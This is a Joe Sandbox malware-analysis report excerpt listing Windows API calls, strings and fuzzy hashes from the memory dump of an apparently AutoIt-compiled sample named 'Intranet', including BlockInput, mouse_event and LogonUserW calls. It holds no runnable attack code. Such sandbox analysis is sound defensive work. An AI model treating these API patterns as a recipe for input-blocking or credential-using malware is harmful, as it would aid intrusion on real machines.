                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 191a596c166ba1f064aa75736ef7db8a47efa88b9c6dc43a88e9725a699b5676
                                                                            • Instruction ID: 6892a8d91bac0254fad532cd528909a372b9311f6aa293ed5527f2efbf051fc6
                                                                            • Opcode Fuzzy Hash: 191a596c166ba1f064aa75736ef7db8a47efa88b9c6dc43a88e9725a699b5676
                                                                            • Instruction Fuzzy Hash: 45B09231064308ABCE402B91EC19B883F68EB55A62F005410F60D452A0CB625454AA91
                                                                            APIs
                                                                            • BlockInput.USER32(00000001), ref: 005145F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BlockInput
                                                                            • String ID:
                                                                            • API String ID: 3456056419-0
                                                                            • Opcode ID: c299722ee05d5df0cea0950c9d0fd3bf876d66e37b8869e40e9ba2d30b8c1299
                                                                            • Instruction ID: 4ff9e28d7bc5cf373440c9485ed44e26a5daf02a9152daf9a5857bb4036efa79
                                                                            • Opcode Fuzzy Hash: c299722ee05d5df0cea0950c9d0fd3bf876d66e37b8869e40e9ba2d30b8c1299
                                                                            • Instruction Fuzzy Hash: 55E0DF312002159FD310AF6AE800A8AFBE9AFA4760F00841AFC49DB350DAB4E8818B90
                                                                            APIs
                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000,00515529), ref: 00505205
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: mouse_event
                                                                            • String ID:
                                                                            • API String ID: 2434400541-0
                                                                            • Opcode ID: b436a29e5e5086c1aaddf8d8f1d7550067356ca5d6554b463cd172d818ccda77
                                                                            • Instruction ID: 1ea58dd5ff0fad7a5ef461e21bbfb1cd83a473ccd2cd6e3e673592ea28ddcfda
                                                                            • Opcode Fuzzy Hash: b436a29e5e5086c1aaddf8d8f1d7550067356ca5d6554b463cd172d818ccda77
                                                                            • Instruction Fuzzy Hash: 3DD06CB5164A0A69ED580724AA1FF7F1A08F341781F945A497182891C2B8946885EE21
                                                                            APIs
                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004F8FA7), ref: 004F9389
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LogonUser
                                                                            • String ID:
                                                                            • API String ID: 1244722697-0
                                                                            • Opcode ID: b44c3845017e3ce7a2eeba80f89df5ed0e1f3e44ace1ad390e6326c78fa30480
                                                                            • Instruction ID: 1a464ad04a3c7e9a7e7a06bbd18cb8d2451b5af7a187f3d88824bd93f37830c2
                                                                            • Opcode Fuzzy Hash: b44c3845017e3ce7a2eeba80f89df5ed0e1f3e44ace1ad390e6326c78fa30480
                                                                            • Instruction Fuzzy Hash: 2AD05E3226460EABEF018EA4DC05EAE3B69EB04B01F808111FE15C51A0C775D835AB60
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 004E0734
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: 03fc59ef0e0d002ee5cfc7df51dfcab52b64ab689bcf197df6badb08e8c6e8ee
                                                                            • Instruction ID: 8f51176a5ef7a8ebf7b7ae7fc7bfd68f5f434542bcef74c3e018ad4b775f490d
                                                                            • Opcode Fuzzy Hash: 03fc59ef0e0d002ee5cfc7df51dfcab52b64ab689bcf197df6badb08e8c6e8ee
                                                                            • Instruction Fuzzy Hash: F0C04CF1800109DBCB05DBA0D99CEFE77BCAB04305F500056A115F2140D7789B449A71
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 004CA35A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 3c988413c27fff6c13d85de1c9bf744adf7bd8705799b979a40ceba7e5530089
                                                                            • Instruction ID: 68665bd6bd1fdcaa84face4686f7d01e72a2b07f4f80798459786d411b6d1a0b
                                                                            • Opcode Fuzzy Hash: 3c988413c27fff6c13d85de1c9bf744adf7bd8705799b979a40ceba7e5530089
                                                                            • Instruction Fuzzy Hash: 56A0223002030CFBCF002F82FC08888BFACEB022A0B008020F80C02232CB33A820AAC0
                                                                            APIs
                                                                            • DeleteObject.GDI32(?), ref: 00517F45
                                                                            • DeleteObject.GDI32(?), ref: 00517F57
                                                                            • DestroyWindow.USER32 ref: 00517F65
                                                                            • GetDesktopWindow.USER32(?), ref: 00517F7F
                                                                            • GetWindowRect.USER32(00000000), ref: 00517F86
                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005180C7
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005180D7
                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051811F
                                                                            • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051812B
                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000,?,88C00000,000000FF,000000FF,?), ref: 00518165
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518187
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0051819A
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181A5
                                                                            • GlobalLock.KERNEL32(00000000), ref: 005181AE
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181BD
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 005181C6
                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181CD
                                                                            • GlobalFree.KERNEL32(00000000), ref: 005181D8
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005181EA
                                                                            • #418.OLEAUT32(88C00000,00000000,00000000,00533C7C,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518200
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00518210
                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518236
                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518255
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518277
                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00518464
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$#418AdjustAllocClientCloseCopyDesktopDestroyHandleImageLockMessageReadSendShowSizeStreamUnlock
                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                            • API String ID: 2158968032-2373415609
                                                                            • Opcode ID: 18559b461537fe711140724f33746ac9291382665fb4f424e55640bb3016fca7
                                                                            • Instruction ID: 3d9d65d1c49d381dde634c1e880460b3eb775581220b83b83e0e9b908162fb5d
                                                                            • Opcode Fuzzy Hash: 18559b461537fe711140724f33746ac9291382665fb4f424e55640bb3016fca7
                                                                            • Instruction Fuzzy Hash: 8402BC71900208EFDB14DFA8CC99EAE7BB9FF49314F048149F915AB2A1CB74AD45DB60
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,00530980), ref: 00523C65
                                                                            • IsWindowVisible.USER32(?), ref: 00523C89
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 4105515805-45149045
                                                                            • Opcode ID: 4a8776a3bc46177ad649a32c474dd935c4366c80598e6747236bed6dce1c2d86
                                                                            • Instruction ID: d9775a0817f8359fd99fe984ffbe7ae01d501ceefa99ad83910caf0df3a3077b
                                                                            • Opcode Fuzzy Hash: 4a8776a3bc46177ad649a32c474dd935c4366c80598e6747236bed6dce1c2d86
                                                                            • Instruction Fuzzy Hash: 8ED16E34204315CBCB04EF11D461E6E7FA5BF96358F10485EF9865B2E2CB29EE4ACB45
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0052AC55
                                                                            • GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052AC86
                                                                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052AC92
                                                                            • SetBkColor.GDI32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?), ref: 0052ACAC
                                                                            • SelectObject.GDI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?), ref: 0052ACBB
                                                                            • InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B), ref: 0052ACE6
                                                                            • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052ACEE
                                                                            • CreateSolidBrush.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052ACF5
                                                                            • FrameRect.USER32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B), ref: 0052AD04
                                                                            • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B,?,?), ref: 0052AD0B
                                                                            • InflateRect.USER32(?,000000FE,000000FE,?,?,?,?,?,?,?,?,?,?,?,?,004DBC7B), ref: 0052AD56
                                                                            • FillRect.USER32(?,?,?), ref: 0052AD88
                                                                            • GetWindowLongW.USER32(?,000000F0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0052ADB3
                                                                              • Part of subcall function 0052AF18: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?), ref: 0052AF51
                                                                              • Part of subcall function 0052AF18: SetTextColor.GDI32(?,?,00000000,?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000), ref: 0052AF55
                                                                              • Part of subcall function 0052AF18: GetSysColorBrush.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF6B
                                                                              • Part of subcall function 0052AF18: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF76
                                                                              • Part of subcall function 0052AF18: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AF93
                                                                              • Part of subcall function 0052AF18: CreatePen.GDI32(00000000,00000001,00743C00,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFA1
                                                                              • Part of subcall function 0052AF18: SelectObject.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFB2
                                                                              • Part of subcall function 0052AF18: SetBkColor.GDI32(?,00000000,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFBB
                                                                              • Part of subcall function 0052AF18: SelectObject.GDI32(?,?,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFC8
                                                                              • Part of subcall function 0052AF18: InflateRect.USER32(?,000000FF,000000FF,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052AFE7
                                                                              • Part of subcall function 0052AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005,?,?,?,?,?,?,?,0052AC1F,?), ref: 0052AFFE
                                                                              • Part of subcall function 0052AF18: GetWindowLongW.USER32(00000000,000000F0,?,?,?,?,?,?,?,0052AC1F,?,?,00000000,?,?), ref: 0052B013
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                            • String ID:
                                                                            • API String ID: 4124339563-0
                                                                            • Opcode ID: 11397aa923bd17e747dff7dabc1dd8c7a3a92632c760c3e67265decdb354b899
                                                                            • Instruction ID: 3a9d035294abc390ecfd89f6b326dd3d358b8d31e00dd88e581c36ffbd760e67
                                                                            • Opcode Fuzzy Hash: 11397aa923bd17e747dff7dabc1dd8c7a3a92632c760c3e67265decdb354b899
                                                                            • Instruction Fuzzy Hash: 2EA1BE72008311BFD7519F64EC18E6BBBA9FF89321F101A19F962A62E0D771D848DF52
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 2660009612-1645009161
                                                                            • Opcode ID: 62f403c4e5570a24d7ad64a7fc9ff84cb922f5a94d9083e7ef956dfd4986e7ee
                                                                            • Instruction ID: 0715ff373fbbaf1d9557dd34a875f1decff988e25f847d0721d2d5380f95a7b6
                                                                            • Opcode Fuzzy Hash: 62f403c4e5570a24d7ad64a7fc9ff84cb922f5a94d9083e7ef956dfd4986e7ee
                                                                            • Instruction Fuzzy Hash: EAA1B070A00209BBCB10AF22CD52FBF3B74BF45744F14412FF805AA292DBB99E15D669
                                                                            APIs
                                                                            • DestroyWindow.USER32(?), ref: 00517BC8
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00517C87
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00517CC5
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00517CD7
                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00517D1D
                                                                            • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00517D29
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517D6D
                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517D7C
                                                                            • GetStockObject.GDI32(00000011,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00517D8C
                                                                            • SelectObject.GDI32(00000000,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517D90
                                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517DA0
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517DA9
                                                                            • DeleteDC.GDI32(00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00517DB2
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?,?,50000000), ref: 00517DDE
                                                                            • SendMessageW.USER32(00000030,00000000,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517DF5
                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00517E30
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517E44
                                                                            • SendMessageW.USER32(00000404,00000001,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00517E55
                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000,?,50000000,?,00000004,00000500), ref: 00517E85
                                                                            • GetStockObject.GDI32(00000011,00000001,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517E90
                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00517E9B
                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00517EA5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                            • API String ID: 2910397461-517079104
                                                                            • Opcode ID: 83703ab226b7e10b9ad56bd3aad7493a6e07db488da0230c6f1c55bac00a4c62
                                                                            • Instruction ID: eb642e734a36a3c4bd918eddfa7107bb0dd64de5a1ead9553c20a3ef0d1cb403
                                                                            • Opcode Fuzzy Hash: 83703ab226b7e10b9ad56bd3aad7493a6e07db488da0230c6f1c55bac00a4c62
                                                                            • Instruction Fuzzy Hash: B9A1A271A00209BFEB14DBA9DC5AFAF7BB9EB18714F004104FA14A72E0C7B4AD44DB64
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0050B361
                                                                            • GetDriveTypeW.KERNEL32(?,00532C4C,?,\\.\,00530980), ref: 0050B43E
                                                                            • SetErrorMode.KERNEL32(00000000,00532C4C,?,\\.\,00530980), ref: 0050B59C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
